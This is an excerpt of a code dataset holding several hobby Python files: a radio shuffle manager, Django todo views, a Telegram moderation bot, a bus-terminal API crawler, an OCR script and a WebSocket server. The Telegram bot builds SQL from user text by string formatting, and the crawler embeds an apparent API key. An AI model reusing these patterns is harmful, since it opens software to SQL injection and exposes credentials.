"usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "5765803075", "text": "import json\nimport glob\nimport random\nimport numpy as np\nimport datetime\nimport time\nimport asyncio\n\n#print(\"test\")\n\nglobalPath = \"C:/Users/2sylv/Desktop/opdrachten programeren/IBS/\"\nlocalPath = \"InvictusRadio V3/\"\n\n# a few functions we need\ndef getNonLocalInfo(path):\n try:\n with open(path, 'r') as f:\n return json.load(f)\n except:\n print(\"WARNING! Info corrupted or missing.\")\n\ndef getManagerInfo():\n try:\n with open(globalPath + localPath + 'InvictusRadioInfo.json', 'r') as f:\n managerInfo = json.load(f)\n except:\n print(\"WARNING! Manager info corrupted or missing, default settings have been selected.\")\n managerInfo = {\"queueStyle\" : \"shuffle\", \"playlist\" : None, \"queue\": [], \"familiarityDictSongs\": {}, \"familiarityDictArtists\": {}, \"songStartTime\": datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")}\n return managerInfo\n\ndef setManagerInfo(managerInfo):\n with open(globalPath + localPath + 'InvictusRadioInfo.json', 'w') as f:\n json.dump(managerInfo, f)\n\ndef getPlaylistInfo(playlist):\n #Check if the playlist exists\n validPlaylist = {}\n spam = glob.glob(globalPath + \"InvictusRadio V3/audioDatabase/*/**/\", recursive=True)\n for egg in spam:\n validPlaylist[egg[egg[:-1].rfind(\"\\\\\")+1:-1]] = egg\n #print(validPlaylist.keys())\n\n if playlist == None:\n playlist = \"music\"\n elif playlist not in validPlaylist.keys():\n playlist = \"music\"\n print(\"WARNING! Selected play not avalible.\")\n\n #colecting relefant information\n playlistPath = validPlaylist[playlist]\n songLinks = glob.glob(playlistPath+\"**\\\\*.mp3\",recursive=True)\n numSongs = len(songLinks)\n return {\"playlistName\" : playlist, \"playlistPath\" : playlistPath, \"songLinks\" : songLinks, \"numSongs\" : numSongs}\n\ndef addSongQueueShuffle():\n \"\"\"\n Pick a random song but have a chance of picking another one if this song or artist is already played\n \"\"\"\n #these setting determine how the shuffle algorithm prefents song or artists not to be picked too often\n songPenalty = 10\n artistPenalty = 5\n penaltyDecay = 0.8\n\n\n #get familiarity dict to check if a song or artist is already played a lot\n managerInfo = getManagerInfo()\n try:\n familiarityDictSongs = managerInfo[\"familiarityDictSongs\"]\n except:\n familiarityDictSongs = {}\n try:\n familiarityDictArtists = managerInfo[\"familiarityDictArtists\"]\n except:\n familiarityDictArtists = {}\n\n\n #get playlist info\n playlistInfo = getPlaylistInfo(managerInfo[\"playlist\"])\n\n\n #this loop will repeat until it found a song that hasn't been played too much\n done = False\n i = 0\n while done == False and i <= 1000:\n #pick random song out of playlist and get song info\n suggestionLink = playlistInfo[\"songLinks\"][random.randint(0,playlistInfo[\"numSongs\"]-1)]\n try:\n with open(suggestionLink[:-4] + \".json\", 'r') as f:\n suggestionInfo = json.load(f)\n except:\n print(\"WARNING! 
Song info corrupted or missing, song is not added to queue.\\nLink to song: \" + suggestionLink)\n            continue\n        \n        \n        #check if we had this song or artist before and get familiarity score\n        if suggestionInfo[\"songName\"] in familiarityDictSongs.keys():\n            familiarityScoreSong = familiarityDictSongs[suggestionInfo[\"songName\"]]\n        else:\n            familiarityScoreSong = 0\n        \n        familiarityScoreArtist = 0\n        for artist in [i for i in suggestionInfo[\"artists\"] if i in familiarityDictArtists.keys()]:\n            familiarityScoreArtist = familiarityScoreArtist + familiarityDictArtists[artist]\n        \n        #if a song or artist has been played a lot it will be discriminated against\n        discriminationOdds = np.e**((familiarityScoreSong + familiarityScoreArtist)*-1)\n        \n        if random.random() <= discriminationOdds:\n            #add new song to queue\n            managerInfo[\"queue\"].append({\"songName\": suggestionInfo[\"songName\"], \"songPath\": suggestionLink, \"songType\": \"song\"})\n            \n            #adjust the familiarity score so the song or artist is played less often in the future\n            try:\n                managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] = managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] + songPenalty\n            except:\n                managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] = songPenalty\n            for artist in suggestionInfo[\"artists\"]:\n                #print(artist)\n                try:\n                    managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist] + artistPenalty\n                except:\n                    managerInfo[\"familiarityDictArtists\"][artist] = artistPenalty\n\n            #adjust the familiarity score so the song or artist is not discriminated against indefinitely\n            for song in managerInfo[\"familiarityDictSongs\"]:\n                managerInfo[\"familiarityDictSongs\"][song] = managerInfo[\"familiarityDictSongs\"][song]*penaltyDecay\n            for artist in managerInfo[\"familiarityDictArtists\"]:\n                managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist]*penaltyDecay    \n\n            done = True\n        i = i + 1\n    \n    if done == False:\n        managerInfo[\"queue\"].append({\"songName\": \"too few songs to shuffle\", \"songPath\": globalPath + \"InvictusRadio V3/audioDatabase/functional/manager warnings/too few songs to shuffle.mp3\", \"songType\": \"functional\"})\n        #managerInfo[\"queuePaths\"].append(globalPath + \"InvictusRadio V3/audioDatabase/functional/manager warnings/too few songs to shuffle.mp3\")\n        for song in managerInfo[\"familiarityDictSongs\"]:\n            managerInfo[\"familiarityDictSongs\"][song] = managerInfo[\"familiarityDictSongs\"][song]*penaltyDecay\n        for artist in managerInfo[\"familiarityDictArtists\"]:\n            managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist]*penaltyDecay    \n    setManagerInfo(managerInfo)\n\n\n\nmanagerInfo = getManagerInfo()\nsetManagerInfo(managerInfo)\naddSongQueueShuffle()\n#test = {'queueStyle': 'shuffle', 'playlist': 'test', 'queuePaths': ['C:/Users/2sylv/Desktop/opdrachten programeren/IBS/InvictusRadio V3/audioDatabase\\\\music\\\\test\\\\Crazy Frog+Axel F.mp3'], 'familiarityDictSongs': {'Crazy Frog': 8.0}, 'familiarityDictArtists': {'Axel F': 4.0}}\n#setManagerInfo(test)\n\n#onAir = datetime.datetime.now()\n#while onAir + datetime.timedelta(seconds=100) >= datetime.datetime.now():\ndef run():\n    managerInfo = getManagerInfo()\n    #make sure the queue is long enough\n    if len(managerInfo[\"queue\"]) <= 5:\n        if managerInfo[\"queueStyle\"] == \"shuffle\":\n            addSongQueueShuffle()\n            print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n            print(\"queue extended!\")\n        
managerInfo = getManagerInfo()\n\n #remove song from queue when done\n if managerInfo[\"queue\"][0][\"songType\"] == \"song\":\n currentSongInfo = getNonLocalInfo(managerInfo[\"queue\"][0][\"songPath\"][:-4]+\".json\")\n if datetime.datetime.strptime(managerInfo[\"songStartTime\"], \"%m/%d/%Y, %H:%M:%S\") + datetime.timedelta(seconds=currentSongInfo[\"duration\"]) <= datetime.datetime.now():\n managerInfo[\"queue\"] = managerInfo[\"queue\"][1:]\n managerInfo[\"songStartTime\"] = datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n setManagerInfo(managerInfo)\n print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n print(\"song deleted\")\n \n #make sure the queue is long enough\n if len(managerInfo[\"queue\"]) <= 4:\n if managerInfo[\"queueStyle\"] == \"shuffle\":\n addSongQueueShuffle()\n print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n print(\"queue extended!\")\n\n\n\n #print(\"yay\")\n #time.sleep(1)\n #asyncio.sleep(1)", "repo_name": "ODDInvictus/InvictusRadio", "sub_path": "InvictusRadio Manager.py", "file_name": "InvictusRadio Manager.py", "file_ext": "py", "file_size_in_byte": 8016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 33, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 38, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 86, "usage_type": "call"}, {"api_name": "json.load", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.e", "line_number": 106, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 165, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 167, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "attribute"}]}
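The heart of the shuffle logic above is an anti-repeat filter: a suggested song is accepted with probability e^-(song score + artist scores), an accepted play adds a penalty to those scores, and all scores decay toward zero each round so nothing is excluded forever. A minimal standalone sketch of that loop; the penalty and decay constants here are hypothetical stand-ins for the songPenalty, artistPenalty and penaltyDecay values defined elsewhere in the script:

import math
import random

SONG_PENALTY, ARTIST_PENALTY, PENALTY_DECAY = 1.0, 0.5, 0.9  # assumed values

def accept_suggestion(song, artists, song_scores, artist_scores):
    # Unseen songs score 0, so the odds start at e**0 == 1.0 and shrink
    # exponentially as the song and its artists accumulate penalties.
    score = song_scores.get(song, 0.0) + sum(artist_scores.get(a, 0.0) for a in artists)
    if random.random() <= math.e ** (-score):
        song_scores[song] = song_scores.get(song, 0.0) + SONG_PENALTY
        for a in artists:
            artist_scores[a] = artist_scores.get(a, 0.0) + ARTIST_PENALTY
        return True
    return False

song_scores, artist_scores = {}, {}
for _ in range(5):
    print(accept_suggestion("Crazy Frog", ["Axel F"], song_scores, artist_scores))
    for d in (song_scores, artist_scores):   # decay step, as in the manager
        for k in d:
            d[k] *= PENALTY_DECAY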
+{"seq_id": "34428500894", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Item\nfrom .forms import ListForm\nfrom django.contrib import messages\n\nimport requests\n\n# Create your views here.\n\n\ndef create_view(request):\n form = ListForm(request.POST or None)\n context = {}\n context[\"form\"] = form\n if form.is_valid():\n form.save()\n all_items = Item.objects.all\n return render(request, \"index.html\", context)\n\n\ndef view_list(request):\n context = {}\n context[\"dataset\"] = Item.objects.all()\n\n return render(request, \"viewlist.html\", context)\n\n\ndef delete_item(request, list_id):\n item = Item.objects.get(pk=list_id)\n item.delete()\n return redirect(\"/todolist/viewlist\")\n\n\ndef edit_item(request, list_id):\n context = {}\n item = Item.objects.get(pk=list_id)\n context[\"dataset\"] = Item.objects.get(pk=list_id)\n if item.status == \"COMPLETE\":\n item.staus = \"INCOMPLETE\"\n elif item.status == \"INCOMPLETE\":\n item.status = \"COMPLETE\"\n item.save()\n return render(request, \"editlist.html\", context)\n\n\ndef edited(request, list_id):\n context = {}\n item = get_object_or_404(Item, pk=list_id)\n form = ListForm(request.POST or None, instance=Item)\n name = request.GET.get(\"id\")\n print(\"form : \", form)\n print(\"name : \", name)\n print(\"req : \", request.POST)\n item.save()\n print(context)\n context[\"dataset\"] = Item.objects.all()\n return render(request, \"viewlist.html\", context)\n", "repo_name": "HassaanMahboob1/DjangoTodoList", "sub_path": "ToDoList/List/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.ListForm", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Item.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Item.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Item.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Item.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 48, "usage_type": "argument"}, {"api_name": "forms.ListForm", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 49, 
"usage_type": "name"}, {"api_name": "models.Item.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "42463808051", "text": "from typing import Type\r\nfrom main import *\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nimport config\r\n\r\n\"\"\"Закреп сообщения\"\"\"\r\n@dp.message_handler(commands=['pin'])\r\nasync def pin(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n \r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n txt = message.text.replace(\"/pin \", \"\")\r\n await message.pin(disable_notification=True)\r\n\r\n\r\n\r\n\r\n\"\"\"Добавление запрещённого слова\"\"\"\r\n@dp.message_handler(commands=['banword'])\r\nasync def newBanWord(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n\r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n word = message.text.replace(\"/banword \", \"\")\r\n cursor.execute(f\"\"\"INSERT INTO banWords\r\n VALUES ('{word}')\"\"\"\r\n )\r\n conn.commit()\r\n await message.answer(\"Слово `\" + word + \"' добавлено в чёрный список\")\r\n\r\n\r\n\r\n\r\n\"\"\"Добавления юзера в белый список\"\"\"\r\n@dp.message_handler(commands=['notdel'])\r\nasync def notban(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n\r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n config.notBanned.append(message.text.replace(\"/notdel \", \"\").replace(\"@\", \"\"))\r\n await message.answer(\"У пользователя '\" + message.text.replace(\"/notdel \", \"\").replace(\"@\", \"\") + \"' не будут удаляться запрещённые сообщения\")\r\n\r\n\r\n\r\n\"\"\"Очистка сообщений по слову\"\"\"\r\n@dp.message_handler(commands=['delword'])\r\nasync def delword(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n \r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n \r\n else:\r\n word = message.text.replace('/delword ', \"\").lower()\r\n\r\n await message.answer(\"Слово '\" + word + \"' добавлено в чёрный список и сообщения, включающие это слово удалены\")\r\n\r\n cursor.execute(f\"\"\"INSERT INTO banWords\r\n VALUES ('{word}')\"\"\"\r\n )\r\n conn.commit()\r\n\r\n sql = f\"SELECT * FROM messages WHERE text LIKE '%{word}%'\"\r\n cursor.execute(sql)\r\n messages = cursor.fetchall()\r\n\r\n for msg in messages:\r\n print(msg)\r\n await bot.delete_message(msg[0], msg[1])\r\n\r\n\r\n\r\n@dp.message_handler(commands=['ban'])\r\nasync def ban(message: types.Message):\r\n banned = message.reply_to_message.from_user.id\r\n config.banned.append(banned)\r\n await bot.ban_chat_member(message.chat.id, banned)\r\n await message.answer(\"Пользователь '\" + str(message.reply_to_message.from_user.username) + \"' идёт нахуй навсегда\")\r\n\r\n\r\n\r\n@dp.message_handler()\r\nasync def lol(message: types.Message):\r\n word = message.text.split(' ')\r\n member = message.from_user.id\r\n \r\n if member in config.banned:\r\n await bot.ban_chat_member(message.chat.id, member)\r\n \r\n for w in word:\r\n sql = f\"SELECT * FROM banWords WHERE word LIKE '%{w}%'\"\r\n cursor.execute(sql)\r\n messages = cursor.fetchone()\r\n print(messages)\r\n if messages:\r\n if(message.from_user.username in config.notBanned):\r\n pass\r\n else:\r\n if(w == messages[0]):\r\n await message.delete()\r\n else:\r\n pass\r\n else:\r\n 
cursor.execute(f\"\"\"INSERT INTO messages\r\n VALUES ({message.chat.id}, {message.message_id}, '{message.text.lower()}')\"\"\"\r\n )\r\n conn.commit()\r\n\r\n\r\n@dp.message_handler(content_types = ['new_chat_members', 'left_chat_member'])\r\nasync def delete(message: types.Message):\r\n members = message.new_chat_members\r\n for mem in members:\r\n if mem.id in config.banned:\r\n await bot.ban_chat_member(message.chat.id, mem.id)\r\n await message.delete()", "repo_name": "Uroniq-git/tg-bot-7", "sub_path": "Telegram bot #7/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 4525, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aiogram.types.Message", "line_number": 8, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 8, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 22, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 22, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 40, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 40, "usage_type": "name"}, {"api_name": "config.notBanned.append", "line_number": 46, "usage_type": "call"}, {"api_name": "config.notBanned", "line_number": 46, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 53, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 53, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 80, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 80, "usage_type": "name"}, {"api_name": "config.banned.append", "line_number": 82, "usage_type": "call"}, {"api_name": "config.banned", "line_number": 82, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 89, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 89, "usage_type": "name"}, {"api_name": "config.banned", "line_number": 93, "usage_type": "attribute"}, {"api_name": "config.notBanned", "line_number": 102, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 117, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 117, "usage_type": "name"}, {"api_name": "config.banned", "line_number": 120, "usage_type": "attribute"}]}
+{"seq_id": "34986775510", "text": "import json\nfrom urllib import parse, request\nfrom ptuBusCrawling.Crawler.Util.SendSlcakMsg import SendSlackMeg\nfrom ptuBusServer.Models import BusTerminalModel\nimport sys\n\n\nclass BusTerminalParsing:\n def __init__(self, CID=\"1220\"):\n apiKey = \"mxl46U1g52x6aVOUX/p969Zbtq9EZmboho4Jp5WiUlQ\"\n self.url = [\n {\n \"url\": \"https://api.odsay.com/v1/api/intercityBusTerminals?\",\n \"isExpress\": 0,\n },\n {\n \"url\": \"https://api.odsay.com/v1/api/expressBusTerminals?\",\n \"isExpress\": 1,\n },\n ]\n self.query = [(\"apiKey\", apiKey), (\"CID\", CID)]\n self.msg = SendSlackMeg()\n\n def makeURL(self, url):\n return url + parse.urlencode(self.query, encoding=\"UTF-8\", doseq=True)\n\n def openURL(self, url):\n url = self.makeURL(url)\n request_url = request.Request(url)\n response = request.urlopen(request_url)\n return response.read().decode(\"utf-8\")\n\n def checkError(self, data):\n if (\"error\" in data) == True:\n code = data[\"error\"][0][\"code\"]\n message = data[\"error\"][0][\"message\"]\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n elif not data[\"result\"]:\n code = \"-8\"\n message = \"필수 입력 값 형식 및 범위 오류\"\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n else:\n return data\n\n def parsing(self):\n count = 1\n for Type in self.url:\n data = self.openURL(Type[\"url\"])\n rDD = self.checkError(json.loads(data))\n isExpress = Type[\"isExpress\"]\n t = rDD[\"result\"]\n for i in range(len(t)):\n if (\n rDD[\"result\"][i][\"stationName\"] == \"평택시외버스터미널\"\n or rDD[\"result\"][i][\"stationName\"] == \"평택고속버스터미널\"\n ):\n startStationID = rDD[\"result\"][i][\"stationID\"]\n startStationName = rDD[\"result\"][i][\"stationName\"]\n results = rDD[\"result\"][i][\"destinationTerminals\"]\n for result in results:\n endStationName = result[\"stationName\"]\n BusTerminalModel(\n id=count,\n startStationName=startStationName,\n startStationID=startStationID,\n endStationName=endStationName[\n endStationName.find(\"/\") + 1 :\n ],\n endStationID=result[\"stationID\"],\n isExpress=int(isExpress),\n ).save()\n count += 1\n\n\nif __name__ == \"__main__\":\n print(BusTerminalParsing().parsing())\n", "repo_name": "ptuBus/ptuBus_Server", "sub_path": "ptuBusCrawling/Crawler/Bus/BusTerminalParsing.py", "file_name": "BusTerminalParsing.py", "file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ptuBusCrawling.Crawler.Util.SendSlcakMsg.SendSlackMeg", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 25, "usage_type": "name"}, {"api_name": "urllib.request.Request", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 47, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.BusTerminalModel", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "36791652530", "text": "import json\nimport base64\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\ndef ToBase64(file):\n with open(file,'rb') as fileObj:\n audio_data = fileObj.read()\n base64_data = base64.b64encode(audio_data)\n result = base64_data.decode()\n return result\n\n# 从文件读取秘钥\ndef getSecret(Path):\n file = open(Path,'r')\n ID = file.readline().strip()\n Key = file.readline()\n file.close()\n return ID,Key\n\nsecretPath = \"./CloudKey.txt\"\nSecretID, SecretKey = getSecret(secretPath)\n\nimport json\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\ndef run(file64):\n try:\n # 实例化一个认证对象,入参需要传入腾讯云账户 SecretId 和 SecretKey,此处还需注意密钥对的保密\n # 代码泄露可能会导致 SecretId 和 SecretKey 泄露,并威胁账号下所有资源的安全性。以下代码示例仅供参考,建议采用更安全的方式来使用密钥,请参见:https://cloud.tencent.com/document/product/1278/85305\n # 密钥可前往官网控制台 https://console.cloud.tencent.com/cam/capi 进行获取\n cred = credential.Credential(SecretID, SecretKey)\n # 实例化一个http选项,可选的,没有特殊需求可以跳过\n httpProfile = HttpProfile()\n httpProfile.endpoint = \"ocr.tencentcloudapi.com\"\n\n # 实例化一个client选项,可选的,没有特殊需求可以跳过\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n # 实例化要请求产品的client对象,clientProfile是可选的\n client = ocr_client.OcrClient(cred, \"ap-beijing\", clientProfile)\n\n # 实例化一个请求对象,每个接口都会对应一个request对象\n req = models.GeneralFastOCRRequest()\n params = {\n \"ImageBase64\":file64\n }\n req.from_json_string(json.dumps(params))\n\n # 返回的resp是一个GeneralFastOCRResponse的实例,与请求对象对应\n resp = client.GeneralFastOCR(req)\n # 输出json格式的字符串回包\n print(resp.to_json_string())\n resultString = resp.to_json_string()\n resultDict = json.loads(resultString)\n content = ''\n for i in resultDict['TextDetections']:\n temp = i['DetectedText']\n content = content+ temp\n print(content)\n fout = open(\"./res.txt\",'w')\n fout.write(content+\"\\n\")\n fout.close()\n \n\n except TencentCloudSDKException as err:\n print(err)\n\nfile = \"./ocrTarget.jpg\"\n\nfile64 = ToBase64(file)\nrun(file64)\n", "repo_name": "DeanZhong912/SGSEliminate", "sub_path": "testOCR.py", "file_name": "testOCR.py", "file_ext": "py", "file_size_in_byte": 3150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base64.b64encode", "line_number": 12, "usage_type": "call"}, {"api_name": "tencentcloud.common.credential.Credential", "line_number": 39, "usage_type": "call"}, {"api_name": "tencentcloud.common.credential", "line_number": 39, "usage_type": "name"}, {"api_name": "tencentcloud.common.profile.http_profile.HttpProfile", "line_number": 41, "usage_type": "call"}, {"api_name": "tencentcloud.common.profile.client_profile.ClientProfile", "line_number": 45, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.ocr_client.OcrClient", "line_number": 48, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.ocr_client", "line_number": 48, "usage_type": "name"}, {"api_name": 
"tencentcloud.ocr.v20181119.models.GeneralFastOCRRequest", "line_number": 51, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.models", "line_number": 51, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "tencentcloud.common.exception.tencent_cloud_sdk_exception.TencentCloudSDKException", "line_number": 73, "usage_type": "name"}]}
+{"seq_id": "20709788730", "text": "import base64\nimport hashlib\nimport re\nimport socketserver\n\n\ndef make_payload(data: bytes):\n payload = bytearray([0, 0])\n payload[0] = 0b10000001 # setting op code to 0x1 and fin to 1\n payload[1] = len(data) & 0b01111111 # setting mask to 0\n return bytes(payload) + data\n\n\nclass Payload:\n FIN = 0b0 # 1 bit\n RSV1, RSV2, RSV3 = 0b0, 0b0, 0b0 # 3 bits - will be set to 0 since no extensions negotiated\n OPCODE = 0b0000 # 4 bits\n MASK = 0b0 # 1 bit\n PAYLOAD_LENGTH = 0b0000000 # 7 bits, Note: assuming length to be between 0-125\n MASKING_KEY = 0 # 4 bytes if masking bit = 1 else 0 bytes\n PAYLOAD_DATA = None # x+y bytes (assuming no extension data provided so x=0)\n\n def __init__(self, payload: bytes):\n self.payload = payload\n self.data = self.break_payload()\n\n def break_payload(self):\n OP_FIN = self.payload[0] # first byte contains FIN/RSV values and the opcode\n self.FIN = OP_FIN >> 7\n self.OPCODE = OP_FIN & 0b00001111\n\n MASK_AND_PAYLOAD_LENGTH = self.payload[1]\n self.MASK = MASK_AND_PAYLOAD_LENGTH >> 7\n self.PAYLOAD_LENGTH = MASK_AND_PAYLOAD_LENGTH & 0b01111111\n if self.MASK:\n self.MASKING_KEY = self.payload[2:6]\n self.PAYLOAD_DATA = self.payload[6:]\n else:\n self.PAYLOAD_DATA = self.payload[2:]\n unmasked = bytearray()\n for i in range(self.PAYLOAD_LENGTH):\n unmasked.append(self.PAYLOAD_DATA[i] ^ self.MASKING_KEY[i % 4])\n\n return unmasked\n\n def __str__(self):\n return str(self.data)\n\n\ndef make_headers(headers: dict):\n result = \"\"\n result += \"HTTP/1.1 101 Switching Protocols\\r\\n\"\n for header, value in headers.items():\n result += f\"{header}: {value}\\r\\n\"\n return result + '\\r\\n'\n\n\ndef get_key(handshake_string):\n key = re.findall(r\"Sec-WebSocket-Key: .*\", handshake_string)[0]\n key = key.split(\":\")[1].strip()\n return key\n\n\nclass Handler(socketserver.BaseRequestHandler):\n MAGIC = \"258EAFA5-E914-47DA-95CA-C5AB0DC85B11\"\n\n def handshake(self) -> None:\n handshake_text = self.request.recv(1024).decode('utf-8')\n print(handshake_text)\n key = get_key(handshake_text)\n key = key + self.MAGIC\n key = hashlib.sha1(key.encode()).digest()\n key = base64.b64encode(key).decode()\n\n headers = {\"Upgrade\": \"websocket\", \"Connection\": \"Upgrade\",\n \"Sec-WebSocket-Accept\": key}\n\n headers = make_headers(headers)\n print('response')\n print(headers)\n self.request.sendall(headers.encode())\n\n def handle(self) -> None:\n self.handshake()\n print('handshake done!')\n while True:\n payload = Payload(self.request.recv(1024))\n print(payload)\n self.request.sendall(make_payload(b\"data received lol\"))\n\n def finish(self) -> 